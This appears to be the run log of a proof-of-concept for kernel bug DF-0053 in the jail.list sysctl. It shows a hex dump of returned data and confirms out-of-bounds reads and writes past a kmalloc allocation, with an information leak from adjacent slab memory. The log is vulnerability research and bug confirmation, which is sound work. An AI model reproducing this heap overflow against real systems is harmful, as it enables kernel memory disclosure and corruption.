DF-0053 / run.log
[*] MIB for jail.list: 258 257
[*] kernel reports jail.list length = 2218 bytes
[*] sysctl read returned 2218 bytes
[*] 1 jail lines -> jlssize = 1024 bytes (kmalloc(1024+1) -> bucket 1152)
[*] last 128 bytes (offset 2090..2218):
082a 2e 30 2e 30 2e 31 34 20 31 30 2e 30 2e 30 2e 31 .0.0.14 10.0.0.1
083a 33 20 31 30 2e 30 2e 30 2e 31 32 20 31 30 2e 30 3 10.0.0.12 10.0
084a 2e 30 2e 31 31 20 31 30 2e 30 2e 30 2e 31 30 20 .0.11 10.0.0.10
085a 31 30 2e 30 2e 30 2e 39 20 31 30 2e 30 2e 30 2e 10.0.0.9 10.0.0.
086a 38 20 31 30 2e 30 2e 30 2e 37 20 31 30 2e 30 2e 8 10.0.0.7 10.0.
087a 30 2e 36 20 31 30 2e 30 2e 30 2e 35 20 31 30 2e 0.6 10.0.0.5 10.
088a 30 2e 30 2e 34 20 31 30 2e 30 2e 30 2e 33 20 31 0.0.4 10.0.0.3 1
089a 30 2e 30 2e 30 2e 32 20 31 30 2e 30 2e 30 2e 31 0.0.0.2 10.0.0.1
[+] BUG DF-0053 CONFIRMED:
kernel returned 2218 bytes
jlssize (count*1024) = 1024
kmalloc bucket (alloc) = 1152
OOB READ vs jlssize = 1194 bytes
OOB READ vs actual alloc end = 1066 bytes (info leak of adjacent slab slack)
OOB WRITE (IPs written past alloc end during IP loop) also occurred in kernel heap
non-zero bytes in OOB-vs-alloc region: 992 (our written IPs + any stale slab data)